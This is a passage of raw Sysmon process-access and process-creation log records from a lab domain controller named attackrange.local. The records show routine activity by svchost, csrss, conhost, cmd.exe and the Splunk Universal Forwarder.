10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-647E-6064-3B00-00000000AE01}37363756C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-647E-6064-3A00-00000000AE01}37283732C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.134{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.112{266CAFBE-647E-6064-3B00-00000000AE01}37363756C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.096{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.080{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.080{266CAFBE-647D-6064-2F00-00000000AE01}27962808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.079{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 